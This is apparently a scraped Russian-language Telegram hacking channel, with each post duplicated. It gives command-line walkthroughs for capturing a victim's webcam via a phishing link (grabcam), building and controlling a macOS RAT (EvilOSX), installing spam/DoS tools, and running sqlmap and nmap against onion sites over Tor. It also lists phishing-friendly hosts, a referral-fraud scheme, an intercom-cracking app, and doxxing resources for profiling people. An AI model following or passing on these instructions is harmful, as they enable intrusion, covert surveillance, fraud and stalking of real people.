This media is not supported in your browser
VIEW IN TELEGRAM
Подборка полезных сервисов для пробива информации по Instagram
Сегодня я собрал для тебя подборку полезных сервисов и инструментов, благодаря которым ты сможешь найти полезную информацию о человеке по Instagram.
• Storiesig.com — сохранённые истории
• Codeofaninja.com — определит ID аккаунта
• Bigsta.net — аналитика аккаунта
• Keyhole.co — анализ аккаунта, при регистрации нет проверок по email и телефону, вводите любые данные, 7 дней бесплатно
• Archive.org — покажет архивированную версию аккаунта
• @InstaBot — скачивает сторис аккаунта
• @usersbox_bot — бот найдет аккаунты в ВК у которых в поле instagram указан искомый логин
Сегодня я собрал для тебя подборку полезных сервисов и инструментов, благодаря которым ты сможешь найти полезную информацию о человеке по Instagram.
• Storiesig.com — сохранённые истории
• Codeofaninja.com — определит ID аккаунта
• Bigsta.net — аналитика аккаунта
• Keyhole.co — анализ аккаунта, при регистрации нет проверок по email и телефону, вводите любые данные, 7 дней бесплатно
• Archive.org — покажет архивированную версию аккаунта
• @InstaBot — скачивает сторис аккаунта
• @usersbox_bot — бот найдет аккаунты в ВК у которых в поле instagram указан искомый логин
Проверяем фото на оригинал
В 1855 году пионер портретной фотографии Оскар Рейландер сфотографировал себя несколько раз и наложил негативы друг на друга при печати. Получившееся двойное селфи считается первым фотомонтажом в истории.
Forensically (https://29a.ch/photo-forensics/#forensic-magnifier)- это онлайн-сервис для проверки было ли фото сфабриковано или нет. В настоящее время постоянно встречаем фейковую информацию с подделанными фото. Чтобы проверить их на монтаж, можно данным сервисом. Сам по себе сайт обладает красивым интерфейсом без лишнего мусора и при этом имеет огромный функционал.
В 1855 году пионер портретной фотографии Оскар Рейландер сфотографировал себя несколько раз и наложил негативы друг на друга при печати. Получившееся двойное селфи считается первым фотомонтажом в истории.
Forensically (https://29a.ch/photo-forensics/#forensic-magnifier)- это онлайн-сервис для проверки было ли фото сфабриковано или нет. В настоящее время постоянно встречаем фейковую информацию с подделанными фото. Чтобы проверить их на монтаж, можно данным сервисом. Сам по себе сайт обладает красивым интерфейсом без лишнего мусора и при этом имеет огромный функционал.
29a.ch
Forensically, free online photo forensics tools
Forensically is a set of free tools for digital image forensics. It includes clone detection, error level analysis, meta data extraction and more.
This media is not supported in your browser
VIEW IN TELEGRAM
Passhunt - ищем дефолтные пароли от любого сетевого устройства домашнего или производственного уровня
В базе приложения хранится достаточное количество паролей (2084 штуки) для входа в роутеры известных производителей.
Установка
💲apt update & apt upgrade
💲pkg install git
💲pkg install python2 python
💲git clone https://github.com/Viralmaniar/Passhunt.git
💲cd Passhunt
💲pip3 install -r requirements.txt
Запуск
💲python3 Passhunt.py
В базе приложения хранится достаточное количество паролей (2084 штуки) для входа в роутеры известных производителей.
Установка
💲apt update & apt upgrade
💲pkg install git
💲pkg install python2 python
💲git clone https://github.com/Viralmaniar/Passhunt.git
💲cd Passhunt
💲pip3 install -r requirements.txt
Запуск
💲python3 Passhunt.py
Фреймворк Santet-Online
Сегодня хотелось бы рассказать вам про одну очень интересную утилиту, с помощью которой можно установить инструменты, такие как: DDOS, WEB HACK, WIFI HACK и так далее.
Santet-Online - это инструмент социальной инженерии с подфункцией, которая фокусируется на атаках на людей с социальными потребностями, таких как службы социальных сетей и службы коротких сообщений.
Атаки, которые запускаются, всегда связаны с рассылкой спама (сообщения, отправляемые повторно), спуфингом и брутфорс-инжинирингом, для подфункции dos или отказа в обслуживании не что иное, как только для привлечения заинтересованных пользователей.
Установка
▪️pkg update
▪️pkg upgrade
▪️pkg install git python
▪️git clone https://github.com/Gameye98/santet-online
▪️cd santet-online
▪️python -m pip install -r requirements.txt
Запуск
▪️python santet.py
Сегодня хотелось бы рассказать вам про одну очень интересную утилиту, с помощью которой можно установить инструменты, такие как: DDOS, WEB HACK, WIFI HACK и так далее.
Santet-Online - это инструмент социальной инженерии с подфункцией, которая фокусируется на атаках на людей с социальными потребностями, таких как службы социальных сетей и службы коротких сообщений.
Атаки, которые запускаются, всегда связаны с рассылкой спама (сообщения, отправляемые повторно), спуфингом и брутфорс-инжинирингом, для подфункции dos или отказа в обслуживании не что иное, как только для привлечения заинтересованных пользователей.
Установка
▪️pkg update
▪️pkg upgrade
▪️pkg install git python
▪️git clone https://github.com/Gameye98/santet-online
▪️cd santet-online
▪️python -m pip install -r requirements.txt
Запуск
▪️python santet.py
Адаптируем инструменты под атаки на onion-сайты
Несмотря на свою скрытность и шифрование, сайты в сети Tor работают практически также как и в clearnet. Соответственно на них также могут присутствовать различные уязвимости, с помощью которых можно нарушить работу ресурса или деанонимизировать его создателя, к примеру. А если некоторые процессы проведения атак универсальны для обоих типов сайтов, то и некоторые популярные инструменты можно также адаптировать для работы в даркнете. Рассмотрим, для примера, как настроить sqlmap и nmap для работы в сети Tor.
Установка:
$ sudo apt instal tor nmap proxychains
Делаем sqlmap анонимной:
1. Для начала запускаем сам Tor:
$ tor
2. Теперь мы можем выполнять команды просто дописывая в конец: "--tor --tor-type=SOCKS5":
$ python2 sqlmap.py -u http://test.onion/index.php?id=2 --tor --tor-type=SOCKS5
Анонимизируем сканирование nmap:
Для анонимизации сканирования через nmap используйте дополнительную утилиту "ProxyChains":
$ apt install proxychains
По умолчанию proxychains уже настроен на работу с Tor, поэтому для начала стандартного сканирования нужно ввести команду:
$ proxychains nmap -sT -PN -n -sV -p 21 test2vy6foxjlzsh.onion
Несмотря на свою скрытность и шифрование, сайты в сети Tor работают практически также как и в clearnet. Соответственно на них также могут присутствовать различные уязвимости, с помощью которых можно нарушить работу ресурса или деанонимизировать его создателя, к примеру. А если некоторые процессы проведения атак универсальны для обоих типов сайтов, то и некоторые популярные инструменты можно также адаптировать для работы в даркнете. Рассмотрим, для примера, как настроить sqlmap и nmap для работы в сети Tor.
Установка:
$ sudo apt instal tor nmap proxychains
Делаем sqlmap анонимной:
1. Для начала запускаем сам Tor:
$ tor
2. Теперь мы можем выполнять команды просто дописывая в конец: "--tor --tor-type=SOCKS5":
$ python2 sqlmap.py -u http://test.onion/index.php?id=2 --tor --tor-type=SOCKS5
Анонимизируем сканирование nmap:
Для анонимизации сканирования через nmap используйте дополнительную утилиту "ProxyChains":
$ apt install proxychains
По умолчанию proxychains уже настроен на работу с Tor, поэтому для начала стандартного сканирования нужно ввести команду:
$ proxychains nmap -sT -PN -n -sV -p 21 test2vy6foxjlzsh.onion
👍1
OpenDomofon PRO 2.0.apk
12.2 MB
Открываем любую дверь в подъезд!
В жизни порой бывает необходимость попасть в подъезд, но не всегда есть от него ключи.. На этот случай энтузиасты придумали свое приложение .
OpenDomofon - это море всевозможной информации по практически всём видам домофонов от инструкции, до способа взломать.
В жизни порой бывает необходимость попасть в подъезд, но не всегда есть от него ключи.. На этот случай энтузиасты придумали свое приложение .
OpenDomofon - это море всевозможной информации по практически всём видам домофонов от инструкции, до способа взломать.
Полностью анонимная почта!
Салют! Сегодня мы хотели бы рассказать вам об одном отличном сервисе анонимной почты, под названием MailFence
https://mailfence.com/
MailFence - это бельгийский сервис электронной почты без любого возможного трекинга, сбора информации и рекламы. Сервис имеет поддержку шифрования GnuPrivacy Guard (GPG), что и не дает возможность выдать данные пользователей третьим лицам.
Сама по себе базовая учетная запись бесплатная, но можно докупить себе больше места и расширенную техподдержку.
Салют! Сегодня мы хотели бы рассказать вам об одном отличном сервисе анонимной почты, под названием MailFence
https://mailfence.com/
MailFence - это бельгийский сервис электронной почты без любого возможного трекинга, сбора информации и рекламы. Сервис имеет поддержку шифрования GnuPrivacy Guard (GPG), что и не дает возможность выдать данные пользователей третьим лицам.
Сама по себе базовая учетная запись бесплатная, но можно докупить себе больше места и расширенную техподдержку.
Mailfence
Secure and private email | Mailfence encrypted email service
Mailfence is the only secure and private email service that gives you control. A free, interoperable encrypted email service protected by Belgian privacy law.
Как взломать вебку с помощью смартфона?
Сегодня рассмотрим реально рабочий хак камеры ноутбука или смартфона. Для того, чтобы всё получилось вам понадобится Android-смартфон с приложением Termux, 5 минут свободного времени и немного, чтобы потенциальная жертва открыла подготовленную нами ссылку.
После открытия termux вводим команды:
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install wget -y
$ pip install lolcat
$ pkg install git -y
$ git clone https://github.com/noob-hackers/grabcam
$ cd grabcam
$ chmod +x grabcam.sh
$ bash grabcam.sh
После идем в настройки телефона, включаем моб. интернет и раздаем wi-fi. Вернувшись в termux, выбираем пункт Ngrok, копируем полученную ссылку, отправляем её жертве - всё!
Для того, чтобы посмотреть фотки вводим:
$ ls
$ termux-open camназваниевашейкартинки.png (у меня cam28Aug2020.png)
Сегодня рассмотрим реально рабочий хак камеры ноутбука или смартфона. Для того, чтобы всё получилось вам понадобится Android-смартфон с приложением Termux, 5 минут свободного времени и немного, чтобы потенциальная жертва открыла подготовленную нами ссылку.
После открытия termux вводим команды:
$ apt-get update -y
$ apt-get upgrade -y
$ pkg install python -y
$ pkg install python2 -y
$ pkg install wget -y
$ pip install lolcat
$ pkg install git -y
$ git clone https://github.com/noob-hackers/grabcam
$ cd grabcam
$ chmod +x grabcam.sh
$ bash grabcam.sh
После идем в настройки телефона, включаем моб. интернет и раздаем wi-fi. Вернувшись в termux, выбираем пункт Ngrok, копируем полученную ссылку, отправляем её жертве - всё!
Для того, чтобы посмотреть фотки вводим:
$ ls
$ termux-open camназваниевашейкартинки.png (у меня cam28Aug2020.png)
GitHub
GitHub - noob-hackers/grabcam: A tool to hack camera from termux for video tutorial visit youtube.com/noobhackers
A tool to hack camera from termux for video tutorial visit youtube.com/noobhackers - noob-hackers/grabcam
👍1
Бесплатные хостинги для поднятия фишинга и т.п.
Проверенные временем проекты, на которых можно разместить любой скам, фишинг, казино, фарм и любой другой проект, не опасаясь потерять доступ и бабки по инициативе админов хостинга.
Список:
▪️ www.awardspace.com
▪️ www.x10hosting.com
▪️ www.freehostia.com
▪️ www.freewebhostingarea.com
▪️ www.5gbfree.com
▪️ www.bravenet.com
▪️ www.free.sprinthost.ru
▪️ www.cyberbunker.ch
▪️ www.greyweb.ru (стоит 1 рубль и не банит фишинг)
Естественно, что данные варианты далеко не панацея. Конечно, лучше использовать какие-то специализированные хостинги, но есть одна проблема - они все платные и не дешёвые. А если с деньгами совсем туго, то и эти варианты подойдут на какое-то время.
Проверенные временем проекты, на которых можно разместить любой скам, фишинг, казино, фарм и любой другой проект, не опасаясь потерять доступ и бабки по инициативе админов хостинга.
Список:
▪️ www.awardspace.com
▪️ www.x10hosting.com
▪️ www.freehostia.com
▪️ www.freewebhostingarea.com
▪️ www.5gbfree.com
▪️ www.bravenet.com
▪️ www.free.sprinthost.ru
▪️ www.cyberbunker.ch
▪️ www.greyweb.ru (стоит 1 рубль и не банит фишинг)
Естественно, что данные варианты далеко не панацея. Конечно, лучше использовать какие-то специализированные хостинги, но есть одна проблема - они все платные и не дешёвые. А если с деньгами совсем туго, то и эти варианты подойдут на какое-то время.
Абузим бот для пробива Глаз Бога!
С недавнего времени, @okoproist_bot начал начислять по 1р за каждого реферала на внутренний счет вашего кошелька. Которым вы можете оплатить себе подписку. Например подписка на месяц стоит 289р, но мы замутим ее намного дешевле!
● Переходим в бота @okoproist_bot, заходим в раздел партнерская программа и копируем вашу реферальную ссылку.
● Далее идем в бота по накрутке @telemnogocombot пополняем баланс на 73р (Стоимость накрутки 1 бота на реф ссылку 0.25р)
● Запускаем накрут подписчиков на свою реф ссылку и ждем пока Глаз Бога начислит вам за всех рефов на ваш внутренний баланс!
Готово! Вместо 289р за месячную подписку, мы отдали всего 73р!
Так же можно не накручивать ботов, а например распространить ссыку по чатам и группам. За каждый переход по ссылке, бот так же будет платить по 1р.
Пользуйтесь, не благодарите!
С недавнего времени, @okoproist_bot начал начислять по 1р за каждого реферала на внутренний счет вашего кошелька. Которым вы можете оплатить себе подписку. Например подписка на месяц стоит 289р, но мы замутим ее намного дешевле!
● Переходим в бота @okoproist_bot, заходим в раздел партнерская программа и копируем вашу реферальную ссылку.
● Далее идем в бота по накрутке @telemnogocombot пополняем баланс на 73р (Стоимость накрутки 1 бота на реф ссылку 0.25р)
● Запускаем накрут подписчиков на свою реф ссылку и ждем пока Глаз Бога начислит вам за всех рефов на ваш внутренний баланс!
Готово! Вместо 289р за месячную подписку, мы отдали всего 73р!
Так же можно не накручивать ботов, а например распространить ссыку по чатам и группам. За каждый переход по ссылке, бот так же будет платить по 1р.
Пользуйтесь, не благодарите!
Создаем вирус удаленного доступа под MacOS
Из-за малого распространения устройств с MacOS создавать под неё вирусы не очень выгодно. Однако это не означает, что их нет. Придерживаться базовых правил кибербезопасности необходимо даже на такой защищенной ОС. Касательно различий вирусов, то сложные трояны подцепить вряд ли удастся, но стандартный Remote Administration Tool (RAT) вполне возможно. Для примера, сгенерировать подобный можно с помощью утилиты EvilOSX.
Установка:
git clone https://github.com/Marten4n6/EvilOSX
EvilOSX
Использование:
sudo python3 start.py
Вводим нужные настройки. Должен сгенерироваться файл, который в последующем отправляется на атакуемый ПК. Вот и все что требуется. В окне с сервером можно узнать список зараженных вписав команду clients. Для подключения к конкретному ПК нужно вписать команду connect <номер хоста>.
Из-за малого распространения устройств с MacOS создавать под неё вирусы не очень выгодно. Однако это не означает, что их нет. Придерживаться базовых правил кибербезопасности необходимо даже на такой защищенной ОС. Касательно различий вирусов, то сложные трояны подцепить вряд ли удастся, но стандартный Remote Administration Tool (RAT) вполне возможно. Для примера, сгенерировать подобный можно с помощью утилиты EvilOSX.
Установка:
git clone https://github.com/Marten4n6/EvilOSX
EvilOSX
Использование:
sudo python3 start.py
Вводим нужные настройки. Должен сгенерироваться файл, который в последующем отправляется на атакуемый ПК. Вот и все что требуется. В окне с сервером можно узнать список зараженных вписав команду clients. Для подключения к конкретному ПК нужно вписать команду connect <номер хоста>.
GitHub
GitHub - Marten4n6/EvilOSX: An evil RAT (Remote Administration Tool) for macOS / OS X.
An evil RAT (Remote Administration Tool) for macOS / OS X. - Marten4n6/EvilOSX
Топ поисковики для пробива
Продолжаем пополнять нашу коллекцию OSINT ресурсов, благодаря котором можно получить интересующую для нас информацию о человеке. Сегодня пройдемся по поиску в соц. сетях, форумах, репозиториях и в поисковиках сети Tor.
Поиск в любой социальной сети:
• kribrum.io — поиск в ВК, Facebook, ОК, Instagram, YouTube, Twitter, LiveJournal, ответы mailru, Telegram;
• go.mail.ru — поиск в ВК, ОК, Facebook, Instagram;
• recruitin.net — составляет Google дорки для поиска в LinkedIn, Dribbble, GitHub, Xing, Stack Overflow, Twitter
• social-searcher.com — поиск в ВК, Vimeo, Facebook, Instagram, Reddit, Flickr, YouTube, Twitter, Tumblr, Dailymotion
• https://cse.google.com/cse?cx=006976128084956795641:ad1xj14zfap — есть фильтр по дате, поиск в Facebook, Youtube, Twitter, Telegram, 4chan, 8Chan, Dailymotion, Reddit, VK, Linked, Instagram, Gab.
Поиск в форумах:
• boardreader.com — фильтры по домену, дате, языку, времени и типу;
• 4chansearch.com — поиск через Google CSE;
• 4plebs.org — архив 4chan, есть расширенный поиск.
Поиск в Pastebin через URL:
• https://psbdmp.ws/api/v3/search/ANYTHING — сайт даст ID записи pastebin где был найден фрагмент текста, замените ANYTHING на любые данные
Поиск в репозиториях с кодом:
• grep.app — есть поддержка регулярных выражений, поиск в GitHub;
• searchcode.com — 11 источников поиска;
• codefinder.org — фильтры по расширению файла.
Поиск IoT и не только:
• www.zoomeye.org — найдет IP, открытые порты, номер автономной системы, и т.д.
• viz.greynoise.io;
• onyphe.io;
• fofa.so;
• maltiverse.com;
• insecam.org — найдет камеры видеонаблюдения.
Поиск в файлообменниках:
• www.4shared.com — фильтр по размеру, алфавиту и дате загрузки;
• filechef.com — создает дорки для Google;
• filesearch.link — поиск в google по доменам более 30 файлообменников;
• osint.sh — файлы в общедоступных серверах AWS S3;
• buckets.grayhatwarfare.com — файлы в общедоступных серверах AWS S3.
Поисковики в сети Tor:
• QUO • tordex • OSS • EvoSearch • SearchDemon • Phobos • Tor66 (mirror) • Tornet Global Search • Torgle • Submarine • Ahmia Search • ExcavaTOR • Raklet • Kilos Search • Recon • Tormax • SeИtoЯ • haystak • Torch • Our Realm • OnionLand Search
Продолжаем пополнять нашу коллекцию OSINT ресурсов, благодаря котором можно получить интересующую для нас информацию о человеке. Сегодня пройдемся по поиску в соц. сетях, форумах, репозиториях и в поисковиках сети Tor.
Поиск в любой социальной сети:
• kribrum.io — поиск в ВК, Facebook, ОК, Instagram, YouTube, Twitter, LiveJournal, ответы mailru, Telegram;
• go.mail.ru — поиск в ВК, ОК, Facebook, Instagram;
• recruitin.net — составляет Google дорки для поиска в LinkedIn, Dribbble, GitHub, Xing, Stack Overflow, Twitter
• social-searcher.com — поиск в ВК, Vimeo, Facebook, Instagram, Reddit, Flickr, YouTube, Twitter, Tumblr, Dailymotion
• https://cse.google.com/cse?cx=006976128084956795641:ad1xj14zfap — есть фильтр по дате, поиск в Facebook, Youtube, Twitter, Telegram, 4chan, 8Chan, Dailymotion, Reddit, VK, Linked, Instagram, Gab.
Поиск в форумах:
• boardreader.com — фильтры по домену, дате, языку, времени и типу;
• 4chansearch.com — поиск через Google CSE;
• 4plebs.org — архив 4chan, есть расширенный поиск.
Поиск в Pastebin через URL:
• https://psbdmp.ws/api/v3/search/ANYTHING — сайт даст ID записи pastebin где был найден фрагмент текста, замените ANYTHING на любые данные
Поиск в репозиториях с кодом:
• grep.app — есть поддержка регулярных выражений, поиск в GitHub;
• searchcode.com — 11 источников поиска;
• codefinder.org — фильтры по расширению файла.
Поиск IoT и не только:
• www.zoomeye.org — найдет IP, открытые порты, номер автономной системы, и т.д.
• viz.greynoise.io;
• onyphe.io;
• fofa.so;
• maltiverse.com;
• insecam.org — найдет камеры видеонаблюдения.
Поиск в файлообменниках:
• www.4shared.com — фильтр по размеру, алфавиту и дате загрузки;
• filechef.com — создает дорки для Google;
• filesearch.link — поиск в google по доменам более 30 файлообменников;
• osint.sh — файлы в общедоступных серверах AWS S3;
• buckets.grayhatwarfare.com — файлы в общедоступных серверах AWS S3.
Поисковики в сети Tor:
• QUO • tordex • OSS • EvoSearch • SearchDemon • Phobos • Tor66 (mirror) • Tornet Global Search • Torgle • Submarine • Ahmia Search • ExcavaTOR • Raklet • Kilos Search • Recon • Tormax • SeИtoЯ • haystak • Torch • Our Realm • OnionLand Search